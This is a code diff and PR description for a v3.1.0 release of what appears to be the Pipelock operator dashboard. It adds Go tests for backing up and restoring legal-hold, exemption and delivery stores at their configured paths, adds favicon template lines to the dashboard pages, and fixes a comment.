+			StateDir:    t.TempDir(),
+			ArchivePath: archive,
+		})
+		if err == nil || !strings.Contains(err.Error(), "validate dashboard backup archive") {
+			t.Fatalf("corrupt archive error = %v", err)
+		}
+	})
+
+	t.Run("configured legal hold parent is not writable", func(t *testing.T) {
+		archive := filepath.Join(t.TempDir(), "legal-holds.tar")
+		writeBackupArchive(t, archive, map[string][]byte{
+			LegalHoldStateFile: legalHoldStateJSON("hold-parent-file"),
+		})
+		parentDir := t.TempDir()
+		if err := os.Chmod(parentDir, ownerReadSearchOnlyMode()); err != nil {
+			t.Fatal(err)
+		}
+		_, err := RestoreStateWithOptions(RestoreOptions{
+			StateDir:           t.TempDir(),
+			ArchivePath:        archive,
+			LegalHoldStorePath: filepath.Join(parentDir, "missing", LegalHoldStateFile),
+		})
+		if err == nil || !strings.Contains(err.Error(), "create dashboard state directory for legal-holds.json") {
+			t.Fatalf("bad legal-hold target error = %v", err)
+		}
+	})
+}
+
 func TestBackupState_RejectsArchivePathThatOverwritesDurableState(t *testing.T) {
 	stateDir := t.TempDir()
 	statePath := filepath.Join(stateDir, ExemptionStateFile)
@@ -267,6 +438,52 @@ func stringSliceContains(values []string, want string) bool {
 		}
 	}
 	return false
+}
+
+func legalHoldStateJSON(id string) []byte {
+	return []byte(fmt.Sprintf(`[{"id":%q,"scope":"session:agent-a","reason":"preserve evidence","created":"2026-01-01T00:00:00Z"}]`, id))
+}
+
+func writeBackupArchive(t *testing.T, path string, files map[string][]byte) {
+	t.Helper()
+	manifest := backupManifest{Version: backupFormatVersion}
+	for _, name := range []string{ExemptionStateFile, DeliveryInboxStateFile, LegalHoldStateFile} {
+		data, ok := files[name]
+		if !ok {
+			continue
+		}
+		sum := sha256.Sum256(data)
+		manifest.Files = append(manifest.Files, backupManifestFile{
+			Store:  storeForArchiveName(name),
+			Name:   name,
+			SHA256: hex.EncodeToString(sum[:]),
+			Size:   int64(len(data)),
+		})
+	}
+	manifestData, err := json.Marshal(manifest)
+	if err != nil {
+		t.Fatal(err)
+	}
+	var buf bytes.Buffer
+	tw := tar.NewWriter(&buf)
+	if err := writeTarFile(tw, backupManifestName, manifestData); err != nil {
+		t.Fatal(err)
+	}
+	for _, file := range manifest.Files {
+		if err := writeTarFile(tw, file.Name, files[file.Name]); err != nil {
+			t.Fatal(err)
+		}
+	}
+	if err := tw.Close(); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(path, buf.Bytes(), 0o600); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func ownerReadSearchOnlyMode() os.FileMode {
+	return 0o500
 }
 
 func TestRestoreState_RejectsTraversalAndUnknownFiles(t *testing.T) {

--- a/enterprise/dashboard/operability_test.go
+++ b/enterprise/dashboard/operability_test.go
@@ -11,6 +11,7 @@ import (
 	"crypto/sha256"
 	"encoding/hex"
 	"encoding/json"
+	"errors"
 	"net/http"
 	"net/http/httptest"
 	"os"
@@ -95,6 +96,151 @@ func TestBackupRestore_RestartAndCorruptionAtomicity(t *testing.T) {
 	}
 }
 
+func TestBackupRestore_RoundTripsConfiguredLegalHoldStore(t *testing.T) {
+	stateDir := t.TempDir()
+	legalHoldPath := filepath.Join(stateDir, "governance", "holds.json")
+	store, err := OpenLegalHoldStore(legalHoldPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	created := time.Date(2026, 2, 3, 4, 5, 6, 0, time.UTC)
+	if err := store.Add(LegalHold{
+		ID:      "hold-af-95",
+		Scope:   "session:agent-a",
+		Reason:  "preserve evidence for review",
+		Created: created,
+	}); err != nil {
+		t.Fatal(err)
+	}
+
+	archive := filepath.Join(t.TempDir(), "dashboard-backup.tar")
+	result, err := BackupStateWithOptions(BackupOptions{
+		StateDir:           stateDir,
+		ArchivePath:        archive,
+		LegalHoldStorePath: legalHoldPath,
+	})
+	if err != nil {
+		t.Fatalf("BackupStateWithOptions: %v", err)
+	}
+	if !stringSliceContains(result.CapturedStores, backupStoreLegalHolds) {
+		t.Fatalf("captured stores = %v, want %s", result.CapturedStores, backupStoreLegalHolds)
+	}
+
+	restoreDir := t.TempDir()
+	restoredLegalHoldPath := filepath.Join(restoreDir, "restored-holds.json")
+	if _, err := RestoreStateWithOptions(RestoreOptions{
+		StateDir:           restoreDir,
+		ArchivePath:        archive,
+		LegalHoldStorePath: restoredLegalHoldPath,
+	}); err != nil {
+		t.Fatalf("RestoreStateWithOptions: %v", err)
+	}
+	restored, err := OpenLegalHoldStore(restoredLegalHoldPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	holds := restored.List()
+	if len(holds) != 1 || holds[0].ID != "hold-af-95" || holds[0].Scope != "session:agent-a" || !holds[0].Created.Equal(created) {
+		t.Fatalf("restored legal holds = %#v", holds)
+	}
+}
+
+func TestBackupRestore_HonorsConfiguredStorePaths(t *testing.T) {
+	stateDir := t.TempDir()
+	sourceDir := t.TempDir()
+	exemptionPath := filepath.Join(sourceDir, "custom-exemptions.json")
+	deliveryPath := filepath.Join(sourceDir, "custom-delivery.json")
+	legalHoldPath := filepath.Join(sourceDir, "custom-legal-holds.json")
+	when := time.Date(2026, 3, 4, 5, 6, 7, 0, time.UTC)
+
+	exemptions, err := OpenExemptionStore(exemptionPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := exemptions.Add(ExemptionRecord{
+		ID:      "custom-exm",
+		Scope:   "api.vendor.example",
+		Owner:   "security",
+		Reason:  "temporary maintenance",
+		Created: when,
+		Expiry:  when.Add(24 * time.Hour),
+	}, when); err != nil {
+		t.Fatal(err)
+	}
+	inbox, err := OpenDeliveryInbox(DeliveryInboxOptions{Path: deliveryPath, QueueSize: 4})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !inbox.Record(DeliveryAttempt{ID: "custom-delivery", AlertID: "alert", Status: DeliveryDelivered, AttemptedAt: when}) {
+		t.Fatal("delivery attempt was dropped")
+	}
+	if err := inbox.Close(context.Background()); err != nil {
+		t.Fatal(err)
+	}
+	holds, err := OpenLegalHoldStore(legalHoldPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := holds.Add(LegalHold{ID: "custom-hold", Scope: "agent:one", Reason: "retention", Created: when}); err != nil {
+		t.Fatal(err)
+	}
+
+	archive := filepath.Join(t.TempDir(), "dashboard-backup.tar")
+	result, err := BackupStateWithOptions(BackupOptions{
+		StateDir:           stateDir,
+		ArchivePath:        archive,
+		ExemptionStorePath: exemptionPath,
+		DeliveryInboxPath:  deliveryPath,
+		LegalHoldStorePath: legalHoldPath,
+	})
+	if err != nil {
+		t.Fatalf("BackupStateWithOptions: %v", err)
+	}
+	for _, want := range []string{backupStoreExemptions, backupStoreDelivery, backupStoreLegalHolds} {
+		if !stringSliceContains(result.CapturedStores, want) {
+			t.Fatalf("captured stores = %v, missing %s", result.CapturedStores, want)
+		}
+	}
+
+	restoreDir := t.TempDir()
+	restoredExemptionPath := filepath.Join(restoreDir, "configured", "exemptions.json")
+	restoredDeliveryPath := filepath.Join(restoreDir, "configured", "delivery.json")
+	restoredLegalHoldPath := filepath.Join(restoreDir, "configured", "holds.json")
+	if _, err := RestoreStateWithOptions(RestoreOptions{
+		StateDir:           filepath.Join(restoreDir, "state"),
+		ArchivePath:        archive,
+		ExemptionStorePath: restoredExemptionPath,
+		DeliveryInboxPath:  restoredDeliveryPath,
+		LegalHoldStorePath: restoredLegalHoldPath,
+	}); err != nil {
+		t.Fatalf("RestoreStateWithOptions: %v", err)
+	}
+	restoredExemptions, err := OpenExemptionStore(restoredExemptionPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if records := restoredExemptions.List(); len(records) != 1 || records[0].ID != "custom-exm" {
+		t.Fatalf("restored exemptions = %#v", records)
+	}
+	health, err := LoadDeliveryHealth(restoredDeliveryPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if health.Delivered != 1 {
+		t.Fatalf("restored delivery health = %#v", health)
+	}
+	restoredHolds, err := OpenLegalHoldStore(restoredLegalHoldPath)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if records := restoredHolds.List(); len(records) != 1 || records[0].ID != "custom-hold" {
+		t.Fatalf("restored legal holds = %#v", records)
+	}
+	if _, err := os.Stat(filepath.Join(restoreDir, "state", ExemptionStateFile)); !errors.Is(err, os.ErrNotExist) {
+		t.Fatalf("default exemption restore path exists or stat failed: %v", err)
+	}
+}
+
 func TestBackupState_RejectsArchivePathThatOverwritesDurableState(t *testing.T) {
 	stateDir := t.TempDir()
 	statePath := filepath.Join(stateDir, ExemptionStateFile)
@@ -112,6 +258,15 @@ func TestBackupState_RejectsArchivePathThatOverwritesDurableState(t *testing.T) 
 	if !bytes.Equal(after, original) {
 		t.Fatalf("durable state changed after rejected backup: %q", after)
 	}
+}
+
+func stringSliceContains(values []string, want string) bool {
+	for _, value := range values {
+		if value == want {
+			return true
+		}
+	}
+	return false
 }
 
 func TestRestoreState_RejectsTraversalAndUnknownFiles(t *testing.T) {

--- a/enterprise/dashboard/overview.tmpl.html
+++ b/enterprise/dashboard/overview.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Operator Overview</title>
   <style>
     :root {

--- a/enterprise/dashboard/trustkeys.tmpl.html
+++ b/enterprise/dashboard/trustkeys.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Trust &amp; Keys</title>
   <style>
     :root { --accent:#00e5a0; --bg:#09090b; --panel:#0e0e11; --border:rgba(255,255,255,.10); --text:#e2e8f0; --text-muted:#94a3b8; --text-dim:#64748b; --muted:var(--text-muted); --dim:var(--text-dim); --good:#00e5a0; --warn:#f59e0b; --bad:#fb7185; }

--- a/enterprise/dashboard/workbench.tmpl.html
+++ b/enterprise/dashboard/workbench.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Signed Action Workbench</title>
   <style>
     :root {

--- a/internal/rules/bundle.go
+++ b/internal/rules/bundle.go
@@ -500,7 +500,7 @@ func prereleaseHasIdentifier(prerelease, ident string) bool {
 }
 
 // isGitDescribeVersion recognizes a `git describe --tags` string by its SHAPE:
-// "<tag>-<commits>-g<shorthash>" (e.g. "v3.0.0-146-gabc1234" or "2-147-gf1c242a0"
+// "<tag>-<commits>-g<shorthash>" (e.g. "v3.1.0-146-gabc1234" or "2-147-gf1c242a0"
 // with a bare-number tag). It keys off the trailing "-<digits>-g<hex>" so a
 // source/CI build is recognized regardless of the tag's own format. It does NOT
 // match arbitrary malformed strings ("abc") or Go pseudo-versions (whose short

--- a/internal/rules/bundle.go
+++ b/internal/rules/bundle.go
@@ -500,7 +500,7 @@ func prereleaseHasIdentifier(prerelease, ident string) bool {
 }
 
 // isGitDescribeVersion recognizes a `git describe --tags` string by its SHAPE:
-// "<tag>-<commits>-g<shorthash>" (e.g. "v3.1.0-146-gabc1234" or "2-147-gf1c242a0"
+// "<tag>-<commits>-g<shorthash>" (e.g. "v3.1.0-146-gabc1234" or "2-147-gf1c242a0")
 // with a bare-number tag). It keys off the trailing "-<digits>-g<hex>" so a
 // source/CI build is recognized regardless of the tag's own format. It does NOT
 // match arbitrary malformed strings ("abc") or Go pseudo-versions (whose short


### PR DESCRIPTION
## What changed

The pre-tag documentation pass for v3.1.0, with two small dashboard fixes folded in.

Docs and release notes:

- CHANGELOG [3.1.0] covering every merged PR since v3.0.0, with Added, Changed, Fixed, Removed, and a Breaking Changes and Upgrade Notes section.
- Version references bumped from 3.0.0 to 3.1.0 across the chart, workflow comments, release manifest, and docs.
- New and expanded operator docs: the dashboard (three auth modes, RBAC, evidence view, exemptions, coverage certificates, backup and restore), conductor dry-run and decision replay, Rekor anchoring controls, evidence-health metrics, and the operator read commands.
- Stats refreshed from make stats.

Dashboard fixes:

- Legal-hold backup completeness. Backup and restore now include the legal-hold store and capture every store by its configured path, so a backup and restore cycle no longer silently drops legal holds. Restore fails closed when a backup carries legal holds and no legal-hold store is configured, rather than dropping them.
- Branded favicon. The dashboard now serves the product logo as its favicon via its public favicon route, replacing the browser default icon.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Added operator convenience commands (including decision explanation) and expanded the operator dashboard with new views and evidence serving.
  * Added documentation and operator guidance for exemption lifecycle overlays, improved backup/restore workflows, and free evidence viewing.
  * Introduced “Evidence Health Metrics” documentation and dashboard runtime snapshot guidance.

* **Security & Reliability**
  * Strengthened receipt/evidence verification and anchoring, improved fail-closed behavior, and tightened integrity/conformance checks.
  * Added upgrade notes covering required configuration/label-parsing and stricter verification behaviors.

* **Documentation**
  * Updated CLI references, examples, health/metrics/configuration guidance, and increased injection pattern coverage from 29 to 32.

* **Chores**
  * Refreshed Helm chart metadata for v3.1.0 and updated dashboard favicon rendering/assets.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->